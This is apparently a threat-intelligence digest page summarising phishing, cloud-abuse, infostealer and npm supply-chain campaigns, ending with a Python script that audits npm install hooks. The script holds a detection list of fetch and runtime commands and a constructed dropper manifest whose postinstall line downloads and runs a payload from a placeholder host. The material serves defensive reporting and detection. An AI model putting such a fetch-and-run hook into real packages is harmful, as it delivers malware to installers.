Mallory

Phishing and fraud campaigns abusing trusted infrastructure and communications

Tags: phishing, email hijacking, compromised credentials, fraud, credential theft, cloud abuse, spam, smishing, government impersonation, SMS lures, HTML smuggling, phishkit, thread hijacking, AWS WorkMail, anti-bot
Updated January 30, 2026 at 02:00 AM. 4 sources.


Threat actors are improving phishing success rates by abusing trusted channels and infrastructure rather than relying on generic lures. In one observed intrusion, the attacker hijacked an active executive email thread through a compromised contractor account and replied inline with a link to a Microsoft 365 lookalike login flow; analysis of detonated samples indicated the EvilProxy adversary-in-the-middle phishkit, with layered anti-bot gating (e.g., Cloudflare Turnstile) and dynamic HTML/PDF content used to capture credentials without exploiting any software vulnerability. Separately, Rapid7 documented a cloud-abuse incident in which attackers used compromised AWS credentials to stand up phishing and spam operations on AWS WorkMail, borrowing Amazon's sender reputation, sidestepping the usual SES anti-abuse controls, and generating only limited, service-native telemetry that blends into normal administrative activity.

A parallel, large-scale consumer fraud operation aligned with the "PayTool" ecosystem was reported targeting Canadian residents through SMS-driven lures (e.g., unpaid fines) that route victims through high-fidelity impersonations of the Government of Canada, Air Canada, and Canada Post, including province-selection workflows that mimic legitimate federal-to-provincial service handoffs before directing victims to localized scam domains. In contrast, LevelBlue SpiderLabs' write-up is broader sector telemetry on attacks targeting education (e.g., brute force T1110, credential dumping T1003, Kerberos ticket forgery T1558) and does not describe the same specific phishing or fraud campaigns, though it reinforces that credential theft remains a dominant initial access path across industries.

Related Stories

Phishing Campaigns Abuse Trusted Platforms and Collaboration Tools to Steal Credentials

Multiple reports describe a broader **credential-theft trend** in which attackers abuse trusted services and familiar business workflows to make phishing more convincing and harder to detect. One campaign used **compromised WordPress sites** and redirects through `skimresources[.]com` to deliver pixel-perfect fake login pages for **Microsoft Teams**, **Xfinity**, and **UAE Pass**, with lures such as missed-voicemail and shared-document alerts. Another campaign abused **LiveChat**'s `lc[.]chat` infrastructure to impersonate brands like **PayPal** and **Amazon**, moving victims into fake support conversations designed to extract sensitive information under the guise of refunds or order issues. A separate industry report reinforces the same operational pattern: attackers increasingly rely on **valid credentials** and trusted collaboration tools rather than software exploits, with cloud identity compromise driving most investigated incidents and some intrusions using **Microsoft Teams voice phishing** and **Quick Assist** to gain access, move laterally, and deploy ransomware. Other references in the set cover different stories entirely, including the **CamelClone** espionage operation, a **FancyBear/APT28** infrastructure exposure, and a general weekly security recap, and do not describe the same phishing activity. The relevant items contain substantive threat intelligence on active attack methods, delivery infrastructure, and attacker tradecraft.

Today
Credential Theft and Evasion Techniques Across Phishing, Webmail Exploitation, and Commodity Malware

Threat actors are continuing to prioritize **credential theft** while using defensive and trusted services to evade detection. DomainTools reported a Microsoft 365 phishing operation that **weaponizes Cloudflare protections** (including *Turnstile* human verification) to block automated analysis and security crawlers, then selectively serves a credential-harvesting flow only to “clean” visitors. The infrastructure used additional gatekeeping such as IP reputation checks (including lookups via `api.ipify.org`), hardcoded blocks for security-vendor and cloud-provider ranges, and user-agent filtering that returns a fake `404` page to bots, with the theft logic hidden behind heavy obfuscation. Separately, Hunt.io documented **Operation Roundish**, assessed with medium-high confidence as aligned to **APT28 (Fancy Bear)**, after discovering an exposed open directory hosting a Roundcube exploitation toolkit used against Ukrainian targets (including `mail.dmsu.gov.ua`). The toolkit included XSS payloads, a Flask-based C2, and modules for credential harvesting, mail forwarding persistence, bulk email exfiltration, address book theft, and 2FA secret extraction, plus a Go-based Linux implant (`httd`) found on a compromised Ukrainian web application. In parallel reporting on credential-access tradecraft, Flashpoint analysis highlighted the low-cost **DarkCloud infostealer** (sold for about **$30**) that steals browser logins/cookies and other data and exfiltrates via common channels (email/FTP/Telegram/HTTP), while Aryaka Threat Labs described the **BlackSanta** campaign using steganographic lures and **BYOVD** techniques to disable EDR and enable stealthy data theft over HTTPS—underscoring that credential access and defense evasion remain common precursors to broader enterprise compromise.

5 days ago
Multi-stage phishing and supply-chain malware campaigns targeting credentials and long-term access

Multiple reports highlight active campaigns using *phishing* and *software supply-chain abuse* to steal credentials and establish persistence. eSentire described an espionage-focused operation targeting residents of India with emails impersonating the Income Tax Department, leading victims to a malicious archive that uses DLL side-loading with a legitimate signed Microsoft application, extensive anti-analysis checks, in-memory shellcode unpacking, UAC bypass, and process masquerading; the payload was identified as a **Blackmoon**-family variant that specifically attempts to disable **Avast Free Antivirus** by automating UI interactions to add exclusions. Separately, Aikido reported a malicious npm package (`ansi-universal-ui`) that deploys a multi-stage infostealer (“**G_Wagon**”) by abusing `postinstall` execution, downloading a Python runtime, running an obfuscated payload, and exfiltrating browser credentials, cloud credentials, Discord tokens, and data from 100+ cryptocurrency wallets to an Appwrite storage bucket; it also includes a Windows DLL used for browser-process injection via NT native APIs. In parallel, network-edge exploitation remains a key access vector: Risky Business reported a renewed wave of attacks against **Fortinet FortiGate** devices via a vulnerability Fortinet allegedly “patched” in December but which attackers can still exploit, enabling SSO authentication bypass (via crafted SAML), creation of new admin accounts, and theft of device configuration; mitigations include disabling the FortiCloud SSO feature (not enabled by default). 

Several other items are general awareness or roundup content rather than specific incident reporting: TechTarget and other blogs emphasized ongoing phishing/email risk (including relay spam abusing legitimate Zendesk instances) and password hygiene, while The Hacker News published a multi-story bulletin that includes (among other items) a spear-phishing campaign in Afghanistan delivering a FALSECUB backdoor via a GitHub-hosted ISO and LNK execution chain; Risky Business also covered Iran's internet blackout and Starlink jamming/spoofing as a communications-control issue rather than an enterprise cyber incident.
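As an added defensive check (example code written for this page, not from Aikido's report or any other cited source), the audit below flags npm install-lifecycle scripts that fetch a payload or hand off to a foreign runtime, the `postinstall` pattern described for `ansi-universal-ui`. The manifests it inspects are constructed for the demonstration; the package name and URL are hypothetical.

```python
"""Audit npm package manifests for install-lifecycle scripts that fetch or
launch an external runtime, the postinstall dropper pattern described above.
Added example, not from the cited reports; manifests below are constructed."""
import json
import re
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Each indicator: (regex, reason). Tuned for the dropper pattern:
# network fetch, then a foreign runtime (Python/PowerShell) running a payload.
SUSPICIOUS = [
    (r"\b(curl|wget|Invoke-WebRequest|iwr)\b", "network fetch"),
    (r"\b(python|python3|powershell|pwsh)\b", "foreign runtime launch"),
    (r"\bnode\s+-e\b", "inline node eval"),
    (r"\b(base64|atob)\b", "base64 decoding"),
]


def audit_manifest(manifest: dict) -> list[dict]:
    """Return one finding per (hook, indicator) hit in the manifest's scripts."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str) or not cmd:
            continue
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, cmd, re.IGNORECASE):
                findings.append({"package": manifest.get("name", "?"),
                                 "hook": hook, "reason": reason, "cmd": cmd})
    return findings


def audit_node_modules(root: Path) -> list[dict]:
    """Walk an installed tree and audit every package.json it can parse."""
    findings = []
    for pj in root.rglob("package.json"):
        try:
            findings.extend(audit_manifest(json.loads(pj.read_text())))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, don't abort
    return findings


# Constructed manifests (hypothetical; not the real package contents).
BENIGN = {"name": "tiny-pad", "scripts": {"test": "node test.js"}}
DROPPER = {"name": "ansi-universal-ui-lookalike", "scripts": {
    "postinstall": "node -e \"require('./setup')\" && "
                   "curl -sL https://example.invalid/rt.zip -o rt.zip && "
                   "python rt/loader.pyc"}}
```

Run `audit_node_modules(Path("node_modules"))` over a tree installed with `npm install --ignore-scripts` to review lifecycle hooks before any of them execute.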

1 month ago
